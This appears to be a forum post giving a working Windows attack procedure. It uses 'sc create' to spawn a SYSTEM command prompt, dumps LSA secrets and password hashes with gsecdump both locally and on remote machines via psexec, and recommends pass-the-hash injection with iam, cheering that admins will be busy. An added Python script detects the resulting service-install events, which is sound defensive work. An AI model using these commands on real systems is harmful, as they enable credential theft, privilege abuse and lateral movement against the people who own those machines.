To get a DOS prompt as NT SYSTEM:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

(The 1053 error is expected: cmd.exe is not a real service and never reports a running status back to the Service Control Manager, but by the time the timeout fires the interactive console has already been spawned. sc create needs administrator rights, so this is an administrator-to-SYSTEM step, not an escalation from a standard user.)
------------
Then in the new DOS window:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)

usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD
Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - [url]www.sysinternals.com[/url]
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from the active logon sessions of a remote system (-c copies gsecdump.exe to the target, -f overwrites any copy already there, -s runs it as SYSTEM; the redirect captures the output locally, because psexec relays the remote program's console output back to you).
These are far more useful than a cachedump of the cached domain credentials: cached credentials are salted with the user name, so generic rainbow tables do not apply to them, whereas these are the plain LM/NT hashes of the accounts currently logged on, and an LM hash is unsalted and easily broken with rainbow tables (wherever LM hash storage has not been disabled).
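As an added example (not from the original post, and not code from the gsecdump or PsExec authors), here is the defender's side of the two tricks above: a small Python script that reads System-log "A service was installed in the system" records (event 7045, whose real data fields are ServiceName, ImagePath, ServiceType, StartType and AccountName) and flags the cmd.exe service created with sc create as well as the PSEXESVC helper service that psexec -s -c installs on the target. The sample records are constructed to mirror what those two commands leave in the log, and the rule thresholds and hostnames are assumptions; on a live host you would feed it the XML exported by wevtutil or Get-WinEvent instead.

```python
"""Flag service installs that look like the sc-create-cmd.exe trick or a
PsExec helper service.  Added, hypothetical detection example: the sample
records are constructed, only the event shape and field names follow the
real Service Control Manager event 7045 in the System log."""
import re
import xml.etree.ElementTree as ET

EVT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}


def _event_xml(time, name, image, stype, start, account, event_id=7045):
    # Mimics the XML of a System-log record as exported by wevtutil / Get-WinEvent.
    return f"""<Event xmlns="{EVT_NS['e']}">
  <System>
    <Provider Name="Service Control Manager"/>
    <EventID Qualifiers="16384">{event_id}</EventID>
    <TimeCreated SystemTime="{time}"/>
    <Computer>WS01</Computer>
  </System>
  <EventData>
    <Data Name="ServiceName">{name}</Data>
    <Data Name="ImagePath">{image}</Data>
    <Data Name="ServiceType">{stype}</Data>
    <Data Name="StartType">{start}</Data>
    <Data Name="AccountName">{account}</Data>
  </EventData>
</Event>"""


# Constructed sample log: one benign install, the shellcmdline service from the
# sc create command above, the service PsExec drops for a -s / -c run, and one
# record with a different EventID that the parser must skip (its body is just
# reused; a real 7036 carries different fields).
SAMPLE_EVENTS = [
    _event_xml("2007-03-16T09:12:00Z", "Spooler",
               r"%SystemRoot%\system32\spoolsv.exe", "user mode service",
               "auto start", "LocalSystem"),
    _event_xml("2007-03-16T10:00:01Z", "shellcmdline",
               r"C:\WINDOWS\system32\cmd.exe /K start", "user mode service",
               "demand start", "LocalSystem"),
    _event_xml("2007-03-16T10:05:42Z", "PSEXESVC",
               r"%SystemRoot%\PSEXESVC.exe", "user mode service",
               "demand start", "LocalSystem"),
    _event_xml("2007-03-16T10:05:43Z", "PSEXESVC",
               r"%SystemRoot%\PSEXESVC.exe", "user mode service",
               "demand start", "LocalSystem", event_id=7036),
]

# Service binaries that are command interpreters rather than real services.
INTERPRETERS = re.compile(r"\\(cmd|powershell|pwsh|cscript|wscript|mshta)\.exe\b", re.I)
# cmd.exe /K keeps the console open after the command, i.e. an interactive shell.
KEEP_OPEN = re.compile(r"\s/[kK]\b")
# PsExec's helper service, by service name or image path.
PSEXEC_SVC = re.compile(r"(^psexesvc$)|(\\psexesvc\.exe\b)", re.I)


def parse_7045(xml_text):
    """Return the EventData of a 7045 record as a dict, or None for other events."""
    root = ET.fromstring(xml_text)
    if root.findtext("e:System/e:EventID", namespaces=EVT_NS) != "7045":
        return None
    rec = {d.get("Name"): (d.text or "")
           for d in root.iterfind("e:EventData/e:Data", EVT_NS)}
    rec["TimeCreated"] = root.find("e:System/e:TimeCreated", EVT_NS).get("SystemTime")
    return rec


def assess(rec):
    """List the reasons a service install looks like the tricks on this page."""
    reasons = []
    image = rec.get("ImagePath", "")
    if INTERPRETERS.search(image):
        reasons.append("service binary is a command interpreter")
    if KEEP_OPEN.search(image):
        reasons.append("cmd.exe /K keeps an interactive console alive")
    if PSEXEC_SVC.search(rec.get("ServiceName", "")) or PSEXEC_SVC.search(image):
        reasons.append("PsExec helper service (PSEXESVC)")
    if reasons and rec.get("AccountName", "").lower() == "localsystem":
        reasons.append("runs as LocalSystem")
    return reasons


def scan(xml_records):
    """Return (time, service name, reasons) for every suspicious 7045 record."""
    hits = []
    for xml_text in xml_records:
        rec = parse_7045(xml_text)
        if rec is None:
            continue
        reasons = assess(rec)
        if reasons:
            hits.append((rec["TimeCreated"], rec["ServiceName"], reasons))
    return hits


if __name__ == "__main__":
    for time, name, reasons in scan(SAMPLE_EVENTS):
        print(f"{time} {name}: {'; '.join(reasons)}")
```

The sc delete at the end of the procedure removes the service again, and PsExec removes PSEXESVC itself when the remote program exits, so the 7045 record is often the only durable trace of either; that is why the rule keys on the install event rather than on services that are still present.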
A tip: you can use iam from the pshtools toolkit to inject the hash information just dumped with gsecdump into the local lsass process and carry out a hash-injection attack. Those foreigners really are good; admins are going to be busy now. The LM/NT hashes captured during ARP spoofing, or obtained with gethash, never actually need to be cracked at all; it is purely a matter of using the tools. As the original article puts it so well: whether the password is 4 characters or 127, once you have the hash you are in, 100% of the time.
Original source: [url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]

I had a look at the original source; it seems to be from /2007/03/16/. Depressing. What a gap.